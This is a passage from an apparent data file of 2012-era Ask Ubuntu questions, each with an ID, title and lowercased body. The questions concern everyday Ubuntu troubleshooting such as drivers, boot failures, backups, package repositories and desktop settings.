31merror : audio device hw:0 can not be acquired ... [ 0m fri jul 20 22:14:18 2012 : [ 1m [ 31merror : can not initialize driver [ 0m fri jul 20 22:14:18 2012 : [ 1m [ 31merror : jackserver : :open ( ) failed with -1 [ 0m fri jul 20 22:14:18 2012 : [ 1m [ 31merror : failed to open server [ 0m fri jul 20 22:14:19 2012 : saving settings to `` /home/jan/.config/jack/conf.xml '' ... 22:14:24.418 can not connect to jack server as client - connection failed . see message dialog for details . can not connect to server socket err = file or directory not found can not connect to server socket jack server is not running or can not be started ( several messages were in german , i did my best translating them ) the pulseaudio process is defenitely not running . i use ubuntu 12.04 64 bit with an nvidia audio card .
166132	after reboot i 've lost all my programs and files	so i turned off my computer and went shopping and when i came home and turned on my computer everything went as usual but i 've lost all my files and programs as if i re-installed ubuntu . please help and thanks in advance .
166142	how would you go about backing up a remote ubuntu vps via ssh ?	so , as i said i have a vps , raspberry pi and a plan , but i am in need of some advice , so here goes . i have a vps with prgmr.com which i ahve up and running nice and smoothly without any issues . i also have a new raspberrypi sat on my desk , with raspberrian downloading as i type . my plan is to use the raspberry pi as a backup server at home , so my question is this : how would you go about backing up a remote ubuntu vps via ssh ? the vps is setup as a web server , but i would like to set up a cron job on the pi so that it can automatically login to the vps and run then download a backup , just incase i manage to brick the thing or something else happens that results in me losing data . naturally i want this backup to contain everything so i can quickly restore the whole server , all nicely configured as it is now if things go bad . how would you go about running this sort of backup ? i figured that i would have to write some kind of bash script to ssh in , compress all the relevant files into a tar.gz or similar and the download the images vis scp . what are your thoughts on this ? what packages etc would you use , and how would you configure it ? the vps has a lamp stack on , so what files would you aim to backup ? it also has lots of other smaller programs such as git , and zendtools installed .
166144	run a program with optirun by default ( bumblebee )	i 'm trying to run minecraft on my geforce card ( with optimus , bumblebee is installed ) , but without having to type the command in the console every time i want to open it . how can i configure bumblebee to always run a program with optirun by default ? will the same method work with a .jar set to launch as an executable as it would with a standard executable ?
166145	why my computer fails when converting many images in imagemagick with one command ?	after updating to precise had a few times the following mishap : when i try to convert to pdf many ( 100 , 200 ) jpegs or pngs , my system gets completely stuck and need hard reboot . or , more fortunately , i get an unreadable pdf . with a few images all seems ok. is there a limit to the number of files converted in imagemagick with one command like convert *.jpg new.pdf or is it something else the matter ?
166148	is there a gui to convert/extract images to/from pdf ?	i mean something like a graphical interface / front end for imagemagick or a simpler application that would allow converting/extracting images through the interface ( not in the terminal ) .
166151	how to run an executable file through jre by default ?	i could do it with openjdk , but it did n't work for my purposes so i 'm using oracle 's jre 7 . i can run the jar through the terminal with java -jar filename.jar and can also right click the file and click open with > oracle java 7 runtime , but i ca n't set the java 7 runtime by default in the properties menu ( probably because the runtime executable is n't located in /usr/bin ) . any quick command lines i can type to set it so i can just hit enter on the file and launch the .jar with java 7 ?
166154	can i manually load drivers for a particular device ? i have a `` next engine '' 3d model scanner .	i desperately would like to use my next engine 3d model scanner ( http : //www.nextengine.com/ ) in ubuntu 12.04 . the software installs nicely using wine , but the device drivers do not install . i am clueless on how to do this and i would greatly appreciate some direction .
166155	how do i fix lenovo t61 unable to resume after suspend ?	i have recently upgraded ubuntu to 12.4 from 11.10 on my lenovo t61 . suspend/resume no longer works . anybody got any insights ? i 've searched and tried a few things there was a suggested grub update ... no joy there were a couple of suggested sleep scripts ... no joy i would greatly appreciate any tips or hints anybody might have . no suspend/resume for a laptop is a showstopper , either i fix this or dump ubuntu and try another os and i really want to stick with ubuntu .
166158	ubuntu 12.04 boot issue after removing kubuntu and resizing partition	i have ubuntu 12.04 lts 64-bit installed on my desktop pc , and it was working fine until a short while ago . i tried to reboot into ubuntu after removing a kubuntu installation from my pc and resizing my ubuntu partition using my 11.10 live cd . when i rebooted , grub showed a black screen and said error : no such partition grub rescue > _ i booted into my live cd again , ubuntu was still installed and all my data was still there . i still can not boot into ubuntu . what should i do ?
166173	installing and running games	i installed some classic games , one being starcraft , and when attempting to open and play the game with wine , all i get is the option to play starcraft . once i select the option , nothing happens . the cd stops spinning and i am left looking at my desktop . am i missing something here ?
166175	where are my ubuntu files ( pictures , music ) after reinstalling windows 7 ?	i reinstalled windows 7 on top of ubuntu 11.10 and tried to get my ubuntu desktop files ( mostly pictures ) using a live cd ( ubuntu 11.10 ) but did not find them . i do n't know where to search . then i reinstalled ubuntu again from the live cd and still did not find any of my pictures where is ubuntu keeping the files ? i can see the system from the live cd but i do n't know the path . how can i recover my files ?
166176	synaptic wo n't start after upgrading to 12.04	i 've ubuntu 12.04 ( upgrade ) in my notebook ( axioo m12cw ) ... i tried to install synaptic package manager , but it wo n't start since upgrading to 12.04..but if i using ubuntu software center , it 's run normally..how to run synaptic run normally ? ?
166184	need help installing a package	so i want to install the zathura package : http : //packages.ubuntu.com/natty/zathura unfortunately it is n't as easy as sudo apt-get install and my resident linux geek has gone to sleep . following the link above it is possible to find some .tar.gz archives , one of which ( zathura_0.0.8.5.orig.tar.gz ) actually includes a readme and a make file . nevertheless whoever wrote those assumes a basic level of competence that i do not have . in particular i have no idea how to check whether i meet the stated requirements , and what to do if i do not . ( running make install produces a bunch of errors , so i assume i do n't have the required dependencies . ) still a beginner so i usually need step by step instructions to install anything . in a response to comments below it is important i am running ubuntu 10.04 lts - the lucid lynx . apparently the package in question is incorporated in the `` ubuntu software centre '' for newer versions of ubuntu . i also appreciate this post is getting to localized . nevertheless i just want to thank everyone who answered/commented . between this discussion and the other post ( how to install a .tar.gz file ? ) i am close to having worked out how to compile the package from source .
166186	why does update manager give me a 404 error with these google repositories ?	i have a red warning sign in my toolbar . when i click on it , it asks me to check for updates . when i check for updates , i get this : w : failed to fetch http : //dl.google.com/linux/deb/dists/testing/non-free/binary-amd64/packages 404 not found [ ip : 74.125.227.46 80 ] w : failed to fetch http : //dl.google.com/linux/deb/dists/testing/non-free/binary-i386/packages 404 not found [ ip : 74.125.227.46 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . this happened to me once before when 12.04 was still in beta , but i ca n't remember what i did . it was a huge mess ! system : 12.04 64-bit sony vaio vgn-nw220f
166194	how can i make xfce4-volumed keep giving notifications in lubuntu ?	i 'm using lubuntu 12.04 , with xfce4-volumed installed , see this question . when i 'm changing the volume using fn+vol- , a nice notification balloon pops up . this is what i want . however , when i try to change the volume 10 seconds later , i first have to click the 'clear all notifications ' button to get further notifications . i want to get rid of this : xfce4-volumed should always be giving notifications , whether or not i 've clicked the button . how can i get this done ? answers that tell me how to disable the whole envelope thing , or change it by another notification daemon to get this done , are also welcome .
166195	logging in to account on 12.04 installation leads to perpetual loop	the strangest thing started happening earlier this week : each time i try to log into my laptop account ( ubuntu 12.04 ) , i get a very short black screen with a few lines of text , then i get sent back to the login screen . intriguingly enough , i can perfectly log into the guest account and into another non-admin account i had created before . i can access the command line via ctrl+alt+f1 and log myself into my account , but then i have no clue as to how further investigate this issue . any help greatly appreciated .
166199	how do i encrypt files after skipping the option during installation ?	i need to encrypt some files on my machine . i did not select the option do encrypt my home folder at installation , but since there was an option to do so i am guessing that ubuntu has some inbuilt encryption utility . if so , what is it and can i use it to encrypt certain files on my system ( not just home folder ) ? ?
166202	is it possible to have orca speak the laptop battery status ?	i have been studying ubuntu 12.04 for a while . if everything works fine , i would like to switch to it from windows 7 . i have searched the net on the way to check battery status with orca but i not yet have an answer . could someone resolve my problem ? thanks !
166203	how can i solve this problem in error during update ?	i received this error message during an update and i do not know how to solve ? could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : malformed line 59 in source list /etc/apt/sources.list ( dist parse ) '
166205	i tried to uninstall eclipse indigo to update to juno on 11.10 lubuntu . now computer wo n't boot	i have booted from the usb but it just stays dormant with a > _ i could type something at boot but not really sure what to type ... i did an error check from the usb key and it came with nothing . i was following the instructions i found on this website after trying from some other instructions that had not worked for me here . the reason i really want to update is because i am having so many errors with trying to get the android sdk plugin to do its thing on eclipse . i figured an install and update would work , when that failed i uninstalled eclipse on synaptics and tried to do it from the tar.gz file . i am not sure whether this is the right question for here , i am going to try on superuser too , just in case .
166212	how to setup hdmi output on m11x with nvidia geforce gt 540m ?	i have an alienware m11x with optimus technology . i setup ( fresh install ) ubuntu 12.04 with bumblebee as below . please help me set up the hdmi output so that i can connect it to my monitor . $ uname -a linux ubuntu 3.2.0-24-generic-pae # 39-ubuntu smp mon may 21 18:54:21 utc 2012 i686 i686 i386 gnu/linux $ lspci | grep -i vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 ) $ dpkg -- get-selections bumblebee install bumblebee-nvidia install $ bumblebeed -version bumblebeed -- version bumblebeed ( bumblebee ) 3.0 copyright ( c ) 2011 the bumblebee project should xrandr normally show hdmi ? $ xrandr -q screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 256mm x 144mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) $ cat /etc/x11/xorg.conf section `` serverlayout '' identifier `` layout0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` nologo '' `` true '' option `` connectedmonitor '' `` dfp '' endsection $ cat /etc/bumblebee/xorg.conf.nvidia section `` serverlayout '' identifier `` layout0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` nologo '' `` true '' option `` connectedmonitor '' `` dfp '' endsection $ cat /etc/bumblebee/xorg.conf.nouveau section `` serverlayout '' identifier `` layout0 '' screen `` screen0 '' option `` autoadddevices '' `` true '' endsection section `` device '' identifier `` device0 '' driver `` nouveau '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' endsection and finally the biggest config file below : $ cat /etc/bumblebee/bumblebee.conf [ bumblebeed ] virtualdisplay=:8 keepunusedxserver=true servergroup=bumblebee turncardoffatexit=false noecomodeoverride=false driver= [ optirun ] vgltransport=proxy allowfallbacktoigc=false pmmethod=none [ driver-nvidia ] kerneldriver=nvidia-current module=nvidia pmmethod=none librarypath=/usr/lib/nvidia-current : /usr/lib32/nvidia-current xorgmodulepath=/usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia [ driver-nouveau ] kerneldriver=nouveau pmmethod=none xorgconffile=/etc/bumblebee/xorg.conf.nouveau any ideas on setting up the optimus to output to the hdmi t.v. ? i want to enable my hdmi with my geforce gt 540m .
166214	disk space management problem	i have my pc with dual boot windows 7 and ubuntu 12.04 . i have a a partition of 62 gb on which i created a virtual hard disk image using virtualbox from within ubuntu and installed joli os . after i uninstalled joli os and uninstalled virtual machine , i still can not recover the disk space that was occupied by the virtual disk image though i am unable to find the virtual disk image . can someone help me and tell me how to solve the problem ?
166215	trouble getting apt-get to work with https	i have a ( private ) apt repository setup on a server . i 'm only allowing access to this repository over ssl , and only with a client certificate . i have tested the connection using curl : $ curl -- cacert /opt/ca.crt -- cert /opt/user.crt -- key /opt/user.key -- pass 1234 https : //example.com/dists/lucid/main/binary-amd64/packages.gz the content is downloaded as expected . i 've created a file in /etc/apt/apt.conf.d/45example-com with debug : :acquire : :https `` true '' ; acquire : :https : :example.com { verify-peer `` true '' ; verify-host `` true '' ; cainfo `` /opt/ca.crt '' ; sslcert `` /opt/user.crt '' ; sslkey `` /opt/user.key '' ; } ; i 've added a file at /etc/apt/sources.list.d/example.com.list with : deb https : //example.com/ lucid main there seems to be a problem with the ca cert , when i try an update i get the following : # apt-get update * connected to example.com ( 8.0.0.8 ) port 443 ( # 0 ) * found 1 certificates in /opt/ca.crt * error reading x.509 key or certificate file * closing connection # 0 the server logs on example.com show that no request got there , so i guess that apt-get is failing before trying to send the request ( which matches what the log says ) . i 've had a hard time finding any documentation on apt-get with ssl on the interwebs , and have n't even been able to find the source code . does anyone have any ideas ?
166217	conky showing up in unity launcher	i 've had my conky configuration properly working in ubuntu 12.04 for sometime . after a recent update and reboot conky is showing up on the unity launcher as an entry when it is running . it 's not locked to the launcher . when conky is killed it goes away . nothing has changed in my conky configuration and otherwise it is working properly . i 'm just looking for it to be blacklisted from the launcher while running . in the screenshot you can see the conky entry third from the bottom .
166221	window buttons have suddenly changed to the right side	i 'm using updated ubuntu 12.04 64b with unity , and im having some problems with the window managing buttons and themes . everything was fine until this week when i rebooted the system and when it booted the upper panel of every app was wrong ( default theme instead the theme that i was using , wrong font and buttons are on the right side ) . it only happens on windowed-mode . when i maximize the windows , theme/font gets right , and buttons are back to the left side . i 've already tried to change theme , reset unity preferences ( unity -- reset ) , reset compiz ( compiz -- reset ) , and nothing worked . i think it is due to some package update , but i dont know which one . did someone had the same problem or know how to fix it ?
166224	how do i install the intel graphics driver in my system ?	can someone help me out and explain or point me in the right direction on how to check video drivers and see if my video card running okay ? i had 10.04 installed on my thinkpad r61 with compiz manager and life was great , until the machine took water damage . i bought an asus ( x54h ) since and am trying out 12.04 , but the desktop just does n't look right . i always struggled with video driver installation . there are no proprietary drivers available in the hardware manager . when i run lspci | grep vga : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) i will greatly appreciate your help . i want to use linux more , but like i said video drivers appear to be my biggest concern . i have also tried 12.04 on my desktop pc , but again failed to configure video card , so switched back to windows 7 .
166226	pydev not found in ubuntu software center	i installed eclipse and then wanted to install pydev plugin to execute python programs . but it gives an error `` pydev not found at https : //pydev.org/updates '' . how can i overcome this ? and is there any other any alternative ?
166231	how do you purge nvidia geforce 7025 drivers ?	how do you remove and purge nvidia graphics drivers recommended for installation in ubuntu 12.04 ?
166232	how do i switch back to lightdm after upgrading to gnome 3.4 ?	my lightdm became curious look like in the picture . how to restore the original look like ubuntu ?
166235	how to copy file from downloads to filesystem/bin ?	i am pretty new to ubuntu 12.04 . i have a problem using my datacard on it , so i got a program called sakis 3g . this program is a file after downloading ; it opens in gedit . i need to copy this file to the bin folder in file system . but , it shows a permission error . can anybody help me out ? how to copy this using terminal with the full command ? the file is in downloads folder and i need to copy it to bin folder in file system without errors .
166239	how can i install drivers and other applications without an internet connection ?	i 'm zaw lin from myanmar and i 'm new to ubuntu . i 'm having difficulties about installing drivers and other post installation . biggest problem is i ca n't get offline installer for drivers and other application likes antivirus and codecs . installation and accessing the installed program is confusing . if this is already answered , then i 'm sorry . i searched over and over again but i only got the solution that requires internet connection . here is my desktop pc specs core i3 550 1gbx2 ( 2gb ram ) nvidia 440 gt seagate 160 gb hd thank for any advices and help .
166242	inheriting parent folder 's permissions	okay . i 've installed ubuntu on an old laptop , which i plan to stick in a drawer and never open again , for use as a file and media server , and all is going well except that i 'm having some problems with permissions . i set the downloads folder so that it 's shared through samba and everyone and their sister has read/write permissions , which is how i want it . however , when a new folder is created inside of it , it does not inherit those permissions . which is not how i want it . some googling has led to what appear to be solutions , except that they 're all written for someone who actually knows what they are doing , which is not me . i 've got the basics of ubuntu down , but just barely . any chance someone can walk me , step by step , to a permanent solution for this ? you 'd have my eternal thanks .
166244	packaging a cmake project ( librocket ) into a .deb , but build script is in a sub folder	i am trying to build a .deb package for librocket ( http : //librocket.com/ ) , but the build script is not in the source root but rather in a subfolder ( /build ) . see the github source : https : //github.com/lloydw/librocket i can build it fine , using : cd build cmake -dbuild_python_bindings=on i have tried debianising the project using dh_make but ca n't seem to figure out how to get it to look in the build folder for a cmakelists.txt file .
166246	how to connect with flash one 1x evdo cdma ( type st804 ) modem	how to connect with flash one 1x evdo modem ? i can not connecting with this modem . so , i can not do apt-get updates . please , i need it .
166247	is apt-get install method the same as ubuntu software centre installation ?	i usually use ubuntu software centre to install programs but i sometimes use apt-get install instead . is the ubuntu software centre method just a user interface equivalent of the apt-get install commands ? i use ubuntu 12.04
166258	notification and indicator applets in gnome classic	i am running a gui-enabled ubuntu 11.10 server installation using gnome classic . i have just one panel which has the following items : power button apps/places a few launchers taskbar workspace switcher notification area clock . my problem is that the notification area , which i want there for background services icons ( spideroak etc ) also includes a volume control and a microphone volume control icon , neither or which is required . how do i get rid of these ? i have searched around and found some references to an indicator applet , which appears to be different from the notification area applet , but i do n't find it in the list of options to add to my panel when i win-alt-right-click the panel . not sure if i should be trying to install that rather than notification area ?
166259	missing package in update manager foomatic-filters_4.0.16-0ubuntu0.1_amd64.deb	get this message when i try to update my stuff . says i have a bad internet connection but i have a nice fiber line here : - ) i belive its missing on the webserver . is there anyone who can put it there for me . message says `` failed to fetch http : //se.archive.ubuntu.com/ubuntu/pool/main/f/foomatic-filters/foomatic-filters_4.0.16-0ubuntu0.1_amd64.deb 404 not found [ ip : 130.239.18.163 80 ] ''
166261	keyboard backlight not working on an asus n56v	see this question . the fn keys are not working using answer in this question i installed the asus-wmi-dkms_0.2_all.deb.gz package now , using xev i see that the keys emit keycodes ( for backlight keys xev says for fn-f3 and fn-f4 keycode 237 ) but no keyboard backlight , also volume keys have no effect ================ original question ======================================== i can not enable the keyboard backlight seems that the leds class is missing i 've not found the classes used in keyboard light hotkey ( fn + f3 and f4 ) rarely work on an asus g60j description of my framework : =========================================================== machine : asus n56v laptop =========================================================== software kubuntu 12.04 amd64 kernel ( 3.5.0.5-generic ) and drivers from xorg-edgers fresh x crack ppa =========================================================== hardware and problems after installation do not boot - solved using boot-repair every couple of hours the system freezes - solved using 3.5 kernel keybord fn keys - not working keyboard backlight - not working nvidia geforce gt - not used glxgears says 60 fps ethernet atheros card - solved install alx driver external subwoofer - solved adding options snd-hda-intel model=asus-mode4 ========================================================== solutions see the answers to the this and this question . ==========================================================
166263	fn keys not working on an asus n56v	the fn keys are not working using answer in 166261 question i installed the asus-wmi-dkms_0.2_all.deb.gz package now , using xev i see that the keys emit keycodes ( for backlight keys xev says for fn-f3 and fn-f4 keycode 237 ) but no keyboard backlight , also volume keys have no effect description of my framework : =========================================================== machine : asus n56v laptop =========================================================== software kubuntu 12.04 amd64 kernel ( 3.5.0.5-generic ) and drivers from xorg-edgers fresh x crack ppa =========================================================== hardware and problems after installation do not boot - solved using boot-repair every couple of hours the system freezes - solved using 3.5 kernel keybord fn keys - not working keyboard backlight - not working nvidia geforce gt - not used glxgears says 60 fps ethernet atheros card - solved install alx driver external subwoofer - solved adding options snd-hda-intel model=asus-mode4 ========================================================== solutions see the asnwers to the 162047 and 166261 questions ==========================================================
166265	asus n56v : nvidia geforce gt not enabled	the video works with the integrated card without swithcing to nvidia geforce gt using the info-center i can see in pci , an nvidia non-vga unclassified device ( 0x00 ) in opengl , an intel ivy bridge graphics controller description of my framework : =========================================================== machine : asus n56v laptop =========================================================== software kubuntu 12.04 amd64 kernel ( 3.5.0.5-generic ) and drivers from xorg-edgers fresh x crack ppa =========================================================== hardware and problems after installation do not boot - solved using boot-repair every couple of hours the system freezes - solved using 3.5 kernel keybord fn keys - not working keyboard backlight - not working nvidia geforce gt - not used glxgears says 60 fps ethernet atheros card - solved install alx driver external subwoofer - solved adding options snd-hda-intel model=asus-mode4 ========================================================== solutions see the asnwers to the 162047 and 166261 questions ==========================================================
166266	what 's the linux equivalent to windows batch files ?	i have a batch file which i use to create an .apk file on my windows machine . now i need to be able to create the .apk file in ubuntu but i do n't know how translate my .bat file to a script to be able to run it on ubuntu . below is the batch file which works fine on windows . will you please give me some hints on how i can run it on ubuntu ? @ echo off set pause_errors=0 : user_configuration : : path to flex sdk set flex_sdk=c : \sdk\flex_sdk_4.5.1.21328 : : path to android sdk set android_sdk=c : \sdk\android : validation if not exist `` % flex_sdk % \bin '' goto flexsdk if not exist `` % android_sdk % \platform-tools '' goto androidsdk goto succeed : validation if not exist `` % flex_sdk % \bin '' goto flexsdk if not exist `` % android_sdk % \platform-tools '' goto androidsdk goto succeed : flexsdk echo . echo error : incorrect path to flex sdk echo . if % pause_errors % ==1 pause exit : androidsdk echo . echo error : incorrect path to android sdk in 'bat\setupsdk.bat' echo . if % pause_errors % ==1 pause exit : succeed set path= % path % ; % flex_sdk % \bin set path= % path % ; % android_sdk % \platform-tools : : android packaging set and_cert_name= '' peymanapp '' set and_cert_pass=fd set and_cert_file=cert\sampleapp.p12 set and_icons=icons/android set and_signing_options=-storetype pkcs12 -keystore `` % and_cert_file % '' -storepass % and_cert_pass % : : application descriptor set app_xml=application.xml : : files to package set app_dir=bin set file_or_dir=-c % app_dir % . : : your application id ( must match < id > of application descriptor ) set app_id=air.com.doitflash.sampleapp : : output packages set dist_path=dist set dist_name=peymanapp : validation % systemroot % \system32\find /c `` < id > % app_id % < /id > '' `` % app_xml % '' > nul if errorlevel 1 goto badid goto end_validation : badid echo . echo error : application id ( app_id ) does not match application descriptor ' % app_xml % ' ( id ) echo . : end_validation set target= set platform=android : :call bat\packager.bat if `` % platform % '' == '' android '' goto android-config : android-config set cert_file= % and_cert_file % set signing_options= % and_signing_options % set icons= % and_icons % set dist_ext=apk set type=apk goto start : start if not exist `` % cert_file % '' goto certificate : : output file set file_or_dir= % file_or_dir % -c `` % icons % '' . if not exist `` % dist_path % '' md `` % dist_path % '' set output= % dist_path % \ % dist_name % % target % . % dist_ext % : : package echo true echo . call adt -package -target % type % % target % % options % % signing_options % `` % output % '' `` % app_xml % '' % file_or_dir % -extdir lib/ echo . if errorlevel 1 goto failed goto end : certificate echo certificate not found : % cert_file % echo . if % pause_errors % ==1 pause exit : failed echo apk setup creation failed . if % pause_errors % ==1 pause exit : end
166267	why does n't cryptkeeper work in 12.04 ?	i recently asked this question about how to encrypt software on my machine . one of the answers suggested cryptkeeper , so i installed it from ubuntu software centre . the installation proceeded without reporting any errors , but i am unable to use the software . i access it from my system tools menu and absoultely nothing happens . has anyone else experienced this problem ? is the best solution to uninstall and reinstall or is there something i am missing in how to use it ( although i do n't see how ) ? ? i have never experienced any problem like this before with installed software - it always 'just works ' .
166268	when setting up a webserver on linux , is it a good practice to make a new user and install everything under that user ?	i want to set up a webserver and i understand that when using linux its not safe to install things under root . so should i install things like apache and php under a different user ? and if i do , will everything be installed in the /usr directory ?
166270	using gui without root privelege	total noob here , just loaded ubuntu 12.04 for the first time yesterday . loaded cinnamon desktop also , to try out both it and unity . i downloaded an application smathstudio.exe into my home/downloads folder , unzipped it , made it work on mono in cinnamon by right-clicking . so far so good . but where should i keep it , what 's the linux philosophy ? i tried to drag and drop it into /usr/bin but could n't , ca n't drag and drop without root privelege . it just fails , does n't even ask for your password . so opened a terminal and `` sudo cp '' -ed it into /usr/bin . except now that it 's there i ca n't run it , ca n't double click it , ca n't add a shortcut to the cinnamon menu as `` sudo mono smathstudio.exe '' fails , opens a terminal and gives heaps of error messages . so what 's the general principle of where applications should live , and how you should access them in cinnamon ?
166274	guest additions in virtualbox problem	in ubuntu 12.04 ... after installing guest additions , i restarted , then , i logged in . after logging in , all i see is a desktop with a invisible bar ( top bar but invisible , i mean ) . when i clicked randomly on the left side , some stuff launched . but note that the left app bar is also invisible , i clicked something at the top until user tab . i logged on as a guest in vm . when in the guest account , everything is ok , but it is very slow and the vm background refreshes ( flashes to black , then back to normal , then flashes to black again , back to normal again , in an infinite loop . ) randomly , please , fix it .
166276	can i get a list of all current programs installed ?	as you 've probably noticed - i am a ubuntu noob ( i just got it yesterday . ) i have installed some programs through terminal before , about 5-10 - so using terminal does n't scare me . but , i 'm getting a new computer soon ( yes , yes , i know i should 've waited and did this on the new computer instead , but i was so excited ! i 'm sure you can relate ; a ; ) and i 've heard it 's hard and time consuming to move apps over to another hard disk , and it would be easier just to install them again . so , i will ... but i do n't really remember what i have installed and want an easy way to do this . is there any way to have a list of installed programs in terminal or somewhere - and possibly even the apt-get commands to reinstall ?
166278	sabnzbdplus will not start on boot but running the init.d script runs fine	i am running the ubuntu 12.04 server edition ( static lan ip ) and was tying to install sabnzbdplus using the apt as per instructions here : ubuntu ppa repository installation has gone smoothly and the server downloads etc no problem ! the problem is that i have edited /etc/default/sabnzbdplus as the directions provided to : # this file is sourced by /etc/init.d/sabnzbdplus # # when sabnzbd+ is started using the init script , the # -- daemon option is always used , and the program is # started under the account of $ user , as set below . # # each setting is marked either `` required '' or `` optional '' ; # leaving any required setting unconfigured will cause # the service to not start . # [ required ] user or uid of account to run the program as : user=omar # [ optional ] full path to the configuration file of your choice ; # otherwise , the default location ( in $ user 's home # directory ) is used : config= # [ optional ] hostname/ip and port number to listen on : host=0.0.0.0 port=8080 # [ optional ] extra command line options , if any : extraopts= my ( omar ) runlevel is n 2 . not quite sure what to do because executing : /etc/init.d/sabnzbdplus works fine and error free . not sure what to do here . advice and assistance would be greatly appreciated ! thanks ,
166279	how can i close all opening windows with a script ?	i want to close all opening windows by executing a shell script ( just like open multiple applications by executing a script ) but i do n't know how . how can i achieve this ?
166280	how do i install the clamav extension for php 5 ?	i 'd like to automatically scan uploaded files for viruses with php . there was an extension called php-clamavlib in earlier versions of ubuntu , but on natty i get e : unable to locate package php5-clamavlib is n't there any extension anymore ? what could i do to archive this ?
166282	why are the login boxes on the left and how can i easily move them to the center ?	i wonder why ubuntu chose to put the login forms at lightdm in the left instead of centering it . i find it totally ugly and a mental effort when i boot up and try to find the login with my eyes wandering from the center to the left . are there any reasons for designing it the way it is ? ( i could not find anything on the ubuntu wiki . ) would there be a super simple way to center everything ?
166287	ubuntu 12.04 - brightness controls not working	controls from `` brightness and lock '' were not working so i 've tried a solution that involved changing grub , which i 'm detailing below : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux= '' quiet splash acpi_backlight=vendor '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' after doing this , the brightness control disappeared like you can see any ideas ? would love to be able to configure brightness or even use apps like f.lux to regulate it automatically . edit : i 've modified the following line to grub_cmdline_linux_default= '' quiet splash acpi_osi= '' and now the brightness controls are back , but whatever i change the brightness remains the same . just in case i 'm using intel h77
166293	how do i customize my desktop to look like this screenshot ?	so i 've come back to linux because i 've fallen back in love with the command line ( albeit i 'm not so great with it ) and the customability of linux based os 's . my question really comes from not knowing how to customize certain aspects of the os . to begin with , i want it to look like this . i have only gotten it to work like this . so i 'm running the cairo-dock with unity bar . but a couple of annoyances . i do n't know how to get that little window thing to go away on the lower left corener . it allows you to switch between the four workspaces , but does n't look as clean . secondly , my `` top bar '' does n't look like the one i want to replicate , because i do n't know where to begin . any solutions for my two problems ? update # 1 : installing gnome 3 seemed to give me a bar on top that looks closer to the outcome , but it does n't work with cairo .
166297	how to disable automatic shutdown on ups battery ?	i have a ups which is configured with apcupsd . it shows all the stats correctly . the problem is that when i switch to battery mode , something sends a shutdown signal to the pc . my guess is that it might have something to do with the power utility from system settings . it can see when it 's charging , and when i plug it out it shows for about 16 minutes of battery life , but it 's shutting it down anyway . can it be disabled ?
166298	is there a program that edits audio files to have the same volume ?	when listening to music in banshee or any other player , i always have to up the volume for certain songs and turn it back down for others because they do n't have the same replay gain . is there an add-on which could normalise my songs in banshee ? or is there a program which could do this to whole of my music library ? i 'm currently running ubuntu 12.04 in case that has any effect on the answers . thanks in advance .
166299	ubuntu webapps not showing up	i 'm trying out the new ubuntu webapps , and it 's a pretty handy feature , the issue i 'm having is the facebook icon no longer shows up in the unity taskbar or the message menu i was wondering does anybody know a way to clear that up ? i 'm using chromium . thanks in advance !
166307	deluge tray icon is not clickable in kde since 12.04	in kubuntu 11.10 i could click the tray icon and deluge 's window would show , but now on 12.04 , nothing happens . only the right click works , and it shows the context menu , but there are no icons . also it does n't show the tooltip with download/upload statistics when i hover the mouse on its tray icon . does anyone know how to make deluge respond to clicking its tray button with the left button of the mouse ?
166311	can not play avi or mp4 file in both movie player and vlc	i downloaded some videos ( both mp4 and avi ) and i am unable to play them both in movie player and vlc . in movie player , it displays error message saying `` could not determine type of stream '' . when i see the properties of those video files , there is no information on 'audio/video ' tab . there should be information about audio and video codec , bitrate , etc . are these videos corrupt ? or , am i missing some codecs ?
166319	transmission continues downloading even after paused	using ubuntu 12.04 64-bit with transmission version 2.51 ( 13280 ) i am uploading screens for better understanding . transmission continues to download the torrent even after pausing . not just with particular torrent but all seems to do it . seems to be occurring in file greater than 500 - 600 mbs . this behaviour was present earlier version of ubuntu too if my memory serves me right , but then , due to dual-boot nature i considered downloading large files in other os . at pausing , downloading data , even after paused .
166322	problems with dvd burning	when i insert a cd or dvd into my disk drive , the computer recognizes the disk , and i can access the information on it , but when i try to burn a dvd , the software does n't seem to recognize a disk . can anyone tell me what 's going on here ?
166325	hud is not working after upgrade	my hud is not working after i upgraded from 11.04 ( and or 11.10 ) . it prompts for command and it tries loading for 4 seconds then gives up .
